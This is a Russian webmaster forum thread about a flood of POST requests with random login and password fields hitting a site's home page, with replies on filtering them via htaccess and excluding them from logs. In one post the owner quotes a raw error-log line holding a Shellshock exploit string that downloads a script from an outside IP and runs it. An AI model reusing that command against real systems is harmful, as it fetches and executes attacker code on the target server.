Куча POST запросов на главную

defin
На сайте с 11.12.2006
Offline
155
1056

Уже почти сутки на главную страницу льется куча POST запросов типа:

login=za06nkylc728px0d85061mun4u0uh2wsbl4903z193..(много букв и цифр)..za4fca934lb9j5081z

&pass=z138bitr715toxi..(много букв и цифр)..mw69uic3dnw
&password=qj29p0yvmcmsjmb70cvjl726n9wa19466z0xeh6ll17m8p39oc
&log=yz7q2j854y6r002eok888njlhql6m25pai928w2s6frztt23l3
&passwrd=10xhwy96ul75qeykrv457344w78q22rxcgg2v8skuz7v8pv5z0
&user=78fz06geyx4s5o62rajuy7r5243x9kd74w917ufpd9d0392xcr
&username=y30b87k8pm9q50y5m6i326n48mzcmn84cp9uy24xi8r401jgnr
&vb_login_username=5y1j525831e5l7776s8cxplsecn645eo6kz7y610p5mq5313h8
&vb_login_md5password=85621281g5clp9bya1q91220t8125bn33173ytgm7v3wjtix83

В секунду порядка 10-20 с разных IP, Юзер-агентов.

Реферер везде стоит главная страница этого же сайта.

Значения у параметров всегда разные.

Как бы отфильтровал их все через htaccess, всем отдается 403. Но логи растут из-за этого...

На ddos вроде не похоже - даже когда не отфильтровал их - сервер нормально их переваливал, т.к. на главной нет никаких обработчиков post запросов.

Может кто сталкивался с таким? Что это вообще?

Можно вообще как-то недопускать POST запросы на главную, чтобы и в логах это все не фиксировалось?

A
На сайте с 20.08.2010
Offline
775
#1

Как отфильтровали?

С осени такое дело, у меня по большей части на внутряк. Если стоит метрика, то ждите в вебмастере огромное количество загруженных страниц, так как метрика их напрямую получает, если не стоит галочка "Запрет отправки страниц на индексацию", хоть это и не важно, если отфильтровали.

Это не ддос, смысл непонятен, но есть мнение, что это сделано для того, что бы опустить страницу в выдаче, поскольку бот видит кучу одинаковых страниц с одним контентом и делает нехорошие выводы.

defin
На сайте с 11.12.2006
Offline
155
#2
awasome:
Как отфильтровали?

RewriteCond %{REQUEST_METHOD} POST

RewriteRule ^index.php$ - [L,F]

А если запросы POST а не GET - разве такие страницы появятся? По факту url же не меняется никак...

zexis
На сайте с 09.08.2005
Offline
388
#3

Сколько POST запросов делается с одного IP?

Поставьте ротацию логов почаще, что бы файлы логов сильно большие не были.

A
На сайте с 20.08.2010
Offline
775
#4
defin:

А если запросы POST а не GET - разве такие страницы появятся? По факту url же не меняется никак...

Честно, сейчас даже не вспомню, какие у меня запросы были, может даже get. Я фильтровал другим путем, он подходит только для вп, думаю.

defin
На сайте с 11.12.2006
Offline
155
#5
zexis:
Сколько POST запросов делается с одного IP?

Максимально с одинакового IP было 135. Иногда идут с одного сразу 3-5-10 раз подряд.

Посчитал и выделил пул в ~230 IP, с которых запросы были больше всего раз. Но очень много, с которых всего по одному-два раза был запрос.

---------- Добавлено 20.12.2014 в 21:41 ----------

Просто боюсь, может ломанули, превратили в бот и теперь шлют "команды", т.к. заметил в логах ошибок такую запись:

1.9.153.65 - - [20/Dec/2014:04:08:38 +0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 361 "-" "() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1"

Полез смотреть, ShellShock конечно же не исправлен был, bash старый. Но на сервере нет ни perl, ни FastCGI - вроде не должно было сработать (как мне сказали)... А так не уверен.

---------- Добавлено 20.12.2014 в 21:45 ----------

Содержание того файла, который пытались загрузить через уязвимость bash, приведено тут - http://jrnerqbbzrq.blogspot.ru/2014/12/a-little-shellshock-fun.html

Не знаю что он делает, не спец :)

T
На сайте с 09.12.2011
Offline
55
tls
#6
defin:

Можно вообще как-то недопускать POST запросы на главную, чтобы и в логах это все не фиксировалось?

SetEnvIf ...

CustomLog ... env=!...

defin
На сайте с 11.12.2006
Offline
155
#7

Спасибо.

Догадка насчет взлома не подтвердилась. Подобные запросы в логах уже как месяц (нацеленные на уязвимость bash). А непонятные POST запросы только второй день...

Все же непонятна цель этих запросов... Генерация входящего трафика только, даже вред не наносит никакой на первый взгляд.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий